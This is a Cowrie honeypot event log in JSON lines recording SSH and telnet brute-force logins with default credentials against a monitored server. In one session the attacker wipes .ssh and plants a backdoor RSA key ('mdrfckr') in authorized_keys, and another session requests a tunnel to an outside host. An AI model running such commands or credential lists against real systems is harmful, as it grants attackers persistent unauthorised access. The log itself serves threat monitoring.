{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:56:28.569210Z","src_ip":"217.154.1.158","session":"d2eb7f16d4fb"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"zabbix","message":"login attempt [zabbix/zabbix] failed","sensor":"my-vps","timestamp":"2025-08-26T19:56:28.611346Z","src_ip":"217.154.1.158","session":"d2eb7f16d4fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49975,"dst_ip":"1.2.3.4","dst_port":22,"session":"391239cf8841","protocol":"ssh","message":"New connection: 212.227.235.229:49975 (1.2.3.4:22) [session: 391239cf8841]","sensor":"my-vps","timestamp":"2025-08-26T19:56:29.544264Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:56:29.545306Z","src_ip":"212.227.235.229","session":"391239cf8841"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:56:29.626130Z","src_ip":"217.154.1.158","session":"d2eb7f16d4fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50301,"dst_ip":"1.2.3.4","dst_port":22,"session":"34b45c89b40c","protocol":"ssh","message":"New connection: 212.227.235.229:50301 (1.2.3.4:22) [session: 34b45c89b40c]","sensor":"my-vps","timestamp":"2025-08-26T19:56:29.664110Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:56:29.664863Z","src_ip":"212.227.235.229","session":"34b45c89b40c"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T19:56:29.794856Z","src_ip":"212.227.235.229","session":"34b45c89b40c"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:56:30.186740Z","src_ip":"212.227.235.229","session":"34b45c89b40c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T19:56:30.317351Z","session":"34b45c89b40c"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":55168,"dst_ip":"1.2.3.4","dst_port":22,"session":"850dc8df15d3","protocol":"ssh","message":"New connection: 217.154.1.158:55168 (1.2.3.4:22) [session: 850dc8df15d3]","sensor":"my-vps","timestamp":"2025-08-26T19:56:45.920836Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:56:45.922515Z","src_ip":"217.154.1.158","session":"850dc8df15d3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:56:45.937627Z","src_ip":"217.154.1.158","session":"850dc8df15d3"}
{"eventid":"cowrie.login.failed","username":"kubernetes","password":"kubernetes","message":"login attempt [kubernetes/kubernetes] failed","sensor":"my-vps","timestamp":"2025-08-26T19:56:45.986285Z","src_ip":"217.154.1.158","session":"850dc8df15d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55736,"dst_ip":"1.2.3.4","dst_port":23,"session":"02046204cd97","protocol":"telnet","message":"New connection: 212.227.125.160:55736 (1.2.3.4:23) [session: 02046204cd97]","sensor":"my-vps","timestamp":"2025-08-26T19:56:46.666473Z"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:56:47.001636Z","src_ip":"217.154.1.158","session":"850dc8df15d3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:57:03.235037Z","src_ip":"212.227.235.229","session":"e640c3bf6947"}
{"eventid":"cowrie.session.closed","duration":180.29482460021973,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:57:03.241352Z","src_ip":"212.227.235.229","session":"e640c3bf6947"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":56654,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ac02790b852","protocol":"ssh","message":"New connection: 217.154.1.158:56654 (1.2.3.4:22) [session: 1ac02790b852]","sensor":"my-vps","timestamp":"2025-08-26T19:57:03.387425Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:57:03.388152Z","src_ip":"217.154.1.158","session":"1ac02790b852"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:57:03.402854Z","src_ip":"217.154.1.158","session":"1ac02790b852"}
{"eventid":"cowrie.login.failed","username":"observer","password":"observer123","message":"login attempt [observer/observer123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:57:03.447182Z","src_ip":"217.154.1.158","session":"1ac02790b852"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:57:04.463401Z","src_ip":"217.154.1.158","session":"1ac02790b852"}
{"eventid":"cowrie.session.closed","duration":30.768850803375244,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:57:17.435256Z","src_ip":"212.227.125.160","session":"02046204cd97"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.148.28","src_port":35692,"dst_ip":"1.2.3.4","dst_port":23,"session":"90e59b93101b","protocol":"telnet","message":"New connection: 176.65.148.28:35692 (1.2.3.4:23) [session: 90e59b93101b]","sensor":"my-vps","timestamp":"2025-08-26T19:57:18.342199Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:57:18.378759Z","src_ip":"176.65.148.28","session":"90e59b93101b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:57:18.447902Z","src_ip":"176.65.148.28","session":"90e59b93101b"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":49062,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f8861ccf3fb","protocol":"ssh","message":"New connection: 199.195.248.191:49062 (1.2.3.4:22) [session: 0f8861ccf3fb]","sensor":"my-vps","timestamp":"2025-08-26T19:57:19.759995Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:57:19.770543Z","src_ip":"199.195.248.191","session":"0f8861ccf3fb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:57:19.859360Z","src_ip":"199.195.248.191","session":"0f8861ccf3fb"}
{"eventid":"cowrie.login.success","username":"root","password":"Password12345","message":"login attempt [root/Password12345] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:57:20.207261Z","src_ip":"199.195.248.191","session":"0f8861ccf3fb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:57:20.410238Z","src_ip":"199.195.248.191","session":"0f8861ccf3fb"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:57:20.410972Z","src_ip":"199.195.248.191","session":"0f8861ccf3fb"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:57:20.411866Z","src_ip":"199.195.248.191","session":"0f8861ccf3fb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:57:20.510369Z","src_ip":"199.195.248.191","session":"0f8861ccf3fb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:57:20.804673Z","src_ip":"199.195.248.191","session":"0f8861ccf3fb"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T19:57:20.805524Z","src_ip":"199.195.248.191","session":"0f8861ccf3fb"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":35344,"dst_ip":"1.2.3.4","dst_port":22,"session":"f32f5c9c7152","protocol":"ssh","message":"New connection: 217.154.1.158:35344 (1.2.3.4:22) [session: f32f5c9c7152]","sensor":"my-vps","timestamp":"2025-08-26T19:57:20.808821Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:57:20.809899Z","src_ip":"217.154.1.158","session":"f32f5c9c7152"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:57:20.824737Z","src_ip":"217.154.1.158","session":"f32f5c9c7152"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123","message":"login attempt [hadoop/123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:57:20.869694Z","src_ip":"217.154.1.158","session":"f32f5c9c7152"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T19:57:20.902017Z","src_ip":"199.195.248.191","session":"0f8861ccf3fb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:57:20.902941Z","src_ip":"199.195.248.191","session":"0f8861ccf3fb"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":49658,"dst_ip":"1.2.3.4","dst_port":22,"session":"40360bd49d76","protocol":"ssh","message":"New connection: 199.195.248.191:49658 (1.2.3.4:22) [session: 40360bd49d76]","sensor":"my-vps","timestamp":"2025-08-26T19:57:20.987141Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:57:21.000590Z","src_ip":"199.195.248.191","session":"40360bd49d76"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:57:21.087827Z","src_ip":"199.195.248.191","session":"40360bd49d76"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T19:57:21.448381Z","src_ip":"199.195.248.191","session":"40360bd49d76"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:57:21.885280Z","src_ip":"217.154.1.158","session":"f32f5c9c7152"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":13204,"dst_ip":"1.2.3.4","dst_port":22,"session":"89e7d9c9aa2a","protocol":"ssh","message":"New connection: 212.227.235.229:13204 (1.2.3.4:22) [session: 89e7d9c9aa2a]","sensor":"my-vps","timestamp":"2025-08-26T19:57:22.350183Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T19:57:22.351325Z","src_ip":"212.227.235.229","session":"89e7d9c9aa2a"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T19:57:22.480382Z","src_ip":"212.227.235.229","session":"89e7d9c9aa2a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:57:22.537040Z","src_ip":"199.195.248.191","session":"40360bd49d76"}
